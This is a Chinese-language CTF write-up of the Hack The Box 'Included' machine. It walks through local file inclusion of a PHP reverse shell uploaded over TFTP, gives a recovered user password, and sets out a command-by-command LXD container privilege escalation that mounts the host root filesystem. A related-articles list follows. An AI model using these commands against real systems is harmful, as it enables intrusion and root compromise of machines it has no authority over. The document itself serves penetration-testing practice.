HTB_Inclued_TFTP文件包含与LXD提权

最新推荐文章于 2024-05-05 18:50:48 发布
最新推荐文章于 2024-05-05 18:50:48 发布
阅读量532 收藏
点赞数
分类专栏: # startpoint 文章标签: php linux 服务器 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40927195/article/details/128812242
版权

文章目录

信息收集

开放80端口,urlhttp://ip:port?file=home.php

测试文件包含,本地包含成功,远程失败,尝试上传后门木马反弹shell

根据图示,网站目录为var/www,其他功能都是死页面

在这里插入图片描述

使用udp扫描,发现五个端口

nmap -sV -v -sU ip

在这里插入图片描述

TFTP

TFTP是简单的文字模式的 FTP 程序,使用的指令和 FTP 类似,尝试上传文件然后包含

要解决的是目录问题,查看etc\passwd文件,其默认目录为/var/lib/tftpboot,上传后可以尝试访问如下路径

http://10.129.140.193/?file=../../../../../../../var/lib/tftpboot/php-reverse-shell.php

连接tftp,并上传文件

tftp ip
put php-reverse-shell.php

在这里插入图片描述

访问路径后,成功回弹

在这里插入图片描述

python3 -c 'import pty;pty.spawn("/bin/bash")'

无权限

在这里插入图片描述

翻文件目录。找到账号密码

ls -al

在这里插入图片描述

转换用户,查看user.txt

su mike
Sheffield19

LXD 提权

Linux Container(LXC)通常被认为是一种轻量级虚拟化技术,它介于Chroot和完整开发的虚拟机之间,LXC可以创建一个跟正常Linux操作系统十分接近的环境,但是不需要使用到单独的内核资源

Linux Daemon(LXD)是一个轻量级容器管理程序,而LXD是基于LXC容器技术实现的,而这种技术之前Docker也使用过。LXD使用了稳定的LXC API来完成所有的后台容器管理工作

总之,使用起来很类似docker

在这里插入图片描述

原理据查询:一个低许可权的使用者能够建立一个用于host和container通讯的socket,当将host中已经建立的一个socket和container连接后,它们之间的连线通讯以LXD服务的凭证(root许可权)而不是呼叫使用者的凭证,所以当container中传送socket和后渗透通讯时,此时host端的socket则是root许可权,所以关键就是怎么在一个得到一个root socket是实现提权

在这里插入图片描述

lxd是一个管理程序 apt install lxd
将用户添加到lxd组 id->uid=1000 gid..128(lxd)
lxd init 初始化配置
创建一个容器 lcx launch ubuntu18.04
与容器建立连接 lcx exec 容器名 --/bin/bash

攻击机root权限用户执行如下命令,构建一个最小的容器镜像

wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
# 以root权限构建
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

在这里插入图片描述

Alpine Linux 是一个围绕 musl libc 和 BusyBox 构建的 Linux 发行版。该镜像只有 5 MB 大小(本次安装只有1.96M),并且可以访问比其他基于 BusyBox 的镜像更完整的包存储库

本机监听

python3 -m http.server 8000

目标主机下载,在根目录cd ~下载的,其他目录很多没有写入权限

wget http://10.10.16.9:8000/lxd.tar.xz
wget http://10.10.16.9:8000/rootfs.squashfs

在这里插入图片描述

导入镜像

# --alias alpine 设置别名
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine

查看镜像

在这里插入图片描述

把宿主机的盘挂载到容器中,这样操作容器就是操作真实宿主机的文件系统

# 将security.privileged设置为true 以便容器具有根文件系统所具有的所有权限
# alpine为镜像别名 privesc为自定义名称
lxc init alpine privesc -c security.privileged=true
# 把source参数的宿主机目录挂载到path参数的容器目录中实现共享
# 宿主机将 / 根目录映射到容器(linux) /mnt/目录下新建的目录root
# source=/root path=/dir01
# 此处可以创建多个不同名称的基于alpine的容器 从容器镜像启动容器
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
# 启动容器 privesc
lxc start privesc
# 启动shell
lxc exec privesc /bin/sh

在这里插入图片描述

# 查看文件 /mnt/root/目录下映射了宿主机根目录下所有的文件
cd /mnt/root/root
cat root.txt

在这里插入图片描述

环境安装报错

ps:安装软件总报如下错误

在这里插入图片描述

解决方法:

cd /etc/apt/sources.list.d
rm docker.list
apt-get update

在这里插入图片描述

解决方法:

apt-get install libc6-dev

签名无效

在这里插入图片描述

解决方法:

wget archive.kali.org/archive-key.asc   //下载签名
apt-key add archive-key.asc   //安装签名
重返太空
关注
专栏目录
HTB】Responder思路——Responder抓取ntlmhash、远程文件包含、远程代码执行、evil-winrm连接
m0_62783065的博客
03-26 639
HTB】Responder思路——Responder抓取ntlmhash、远程文件包含、远程代码执行、evil-winrm连接
linux提权大全3(lxc容器提权
最新发布
anddddoooo的博客
09-09 557
wiki:Linux 容器( LXC ) 是一种操作系统级虚拟化方法,用于使用单个 Linux 内核在控制主机上 运行多个隔离的Linux系统(容器)。Linux内核提供了cgroups功能,允许对资源(CPU、内存、块 I/O、网络等)进行限制和优先排序,而无需启动任何虚拟机,还提供了命名空间隔离功能,允许完全隔离应用程序对操作环境的视图,包括进程树、网络、用户 ID和已挂载的 文件系统。LXC 结合了内核的 cgroups 和对隔离命名空间的支持,为应用程序提供隔离的环境。
lxd&lxc Group提权
hirak0的博客
04-13 633
lxd和lxc Linux Container(LXC)通常被认为是一种轻量级虚拟化技术,它介于Chroot和完整开发的虚拟机之间,LXC可以创建一个跟正常Linux操作系统十分接近的环境,但是不需要使用到单独的内核资源。 Linux Daemon(LXD)是一个轻量级容器管理程序,而LXD是基于LXC容器技术实现的,而这种技术之前Docker也使用过。LXD使用了稳定的LXC API来完成所有的后台容器管理工作,并且增加了REST API支持,更进一步地提升了用户体验度。 lxd/lxc Group -
【内网攻防】利用Lxd进行Linux权限提升
weixin_46022776的博客
05-05 588
利用LXC对Linux普通账户提权
渗透DC-5-文件包含
告白的博客
08-13 326
0x00 环境介绍 本次研究DC系列dc-5渗透提权过程 靶机下载:https://www.vulnhub.com/entry/dc-5,314/ 0x01 信息收集 1)IP收集----192.168.213.153 arp-scan -l 2)端口扫描----80/tcp open http nginx 1.6.2 nmap -A -p- 192.168.213.153 3)目录爆破,使用dirbuster,调用kali自带的字典, 字典位置:usr/share/wordlists/d
HTB_tools-开源
05-02
`HTB_tools`的主要特性包括: 1. **易用性**:通过图形化界面或者命令行工具,用户可以直观地设置带宽限制和优先级,无需深入了解复杂的网络配置语法。 2. **实时监控**:提供实时的带宽使用情况监控,帮助用户...
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
今天我们将聚焦于一个名为`htb_cli`的Python库,其版本为0.1.1,对应的文件为`htb_cli-0.1.1-py3-none-any.whl`。这个库主要服务于Python 3环境,兼容各种平台,且易于安装和使用。 首先,`htb_cli`这个名字暗示了...
ROS_HTB_优先限速
09-07
标题与描述中的“ROS_HTB_优先限速”是指在MikroTik RouterOS系统中,使用Hierarchical Token Bucket(HTB)算法进行网络流量的优先级管理和限速设置的一种技术。这一策略通常用于确保关键应用或服务的网络质量,...
PyPI 官网下载 | htb_cli-0.1.1-py3-none-any.whl
01-05
资源来自pypi官网。 资源全名:htb_cli-0.1.1-py3-none-any.whl
ROS_HTB_优先限速:提升TCP/443、UDP/8000等端口访问策略
本文档主要介绍了如何在RouterOS v3.0环境下利用高级队列调度(HTB,Hierarchical Token Bucket)技术实现网络流量的优先级限速控制。ROS_HTB_优先限速脚本通过设置IPFirewall mangle链中的规则,对不同类型的网络...
Vulunhub Web2靶机练习之lxc
Aiwin的博客
10-04 980
Vulunhub Web2靶机练习
文件包含利用方式(总结)
PANDA墨森的博客
07-13 4446
一、利用思路总结: 1、包含一些敏感的配置文件,获取目标敏感信息 2、配合图片马getshell 3、包含临时文件getshell 4、包含session文件getshell 5、包含日志文件getshell(Apach、SSH等等) 6、利用php伪协议进行攻击 二、具体利用方法: ①包含一些敏感的配置文件 windows常见的敏感文件路径: C:\boot.ini //查看系统版本 C:\Windows\System32\inetsrv\MetaBase.xml //IIS配.
文件上传绕过和提权——(感谢公司搭建靶机和给予帮助的各位同仁)
爱上卿的博客
04-11 2906
文件上传和提权漏洞测试(测试环境为IIS6.0,存在文件解析漏洞)获得网站后台后,寻找上传点upfile均对木马格式进行了过滤,于是利用IIS6.0本身漏洞,建立xx.ASP文件,来允许上传和调用木马。方法一:登录后台有数据库备份功能,利用数据库备份创建类似x.asp 的目录n  利用文件上传模块上传包含一句话的图片木马(一句话图片木马见百度) 修改上传路径(修改后缀和修改conten-type尝...
Web安全之文件包含漏洞
我不是大牛
07-04 2808
什么是文件包含 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件。而无需再次编写,这种 文件调用的过程一般被称为文件包含。 例如:include “conn.phpPHP中常见包含文件函数 include() 当使用该函数包含文件时,只有代码执行到include()函数时才将文件包含进来,发生错误时之给出一个警告,继续向下执行。 include_once()...
提权【几种提权方式】
weixin_34233679的博客
10-31 957
(( 本地溢出提权 ))计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的,如果用户输入的数据超过了这个缓存区的长度,那么这个程序就会溢出了.缓存区溢出漏洞主要是由于许多软件没有对缓存区检查而造成的.利用一些现成的造成溢出漏洞的exploit通过运行,把用户从users组或其它系统用户中提升到administrators组.想要执行cmd命令,就要wscript.she...
文件包含漏洞(绕过姿势)
热门推荐
求天下者,积少成多
06-01 1万+
文件包含漏洞是渗透测试过程中用得比较多的一个漏洞,主要用来绕过waf上传木马文件。今日在逛Tools论坛时,发现了一种新型的文件包含姿势,在此记录分享,并附上一些文件包含漏洞的基础利用姿势。特殊姿势利用phar://协议特性可以在渗透过程中帮我们绕过一些waf检测,phar:// 数据流包装器自 PHP 5.3.0 起开始有效,貌似可以绕过安全狗。利用过程新建shell.php代码内容:123<?p
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值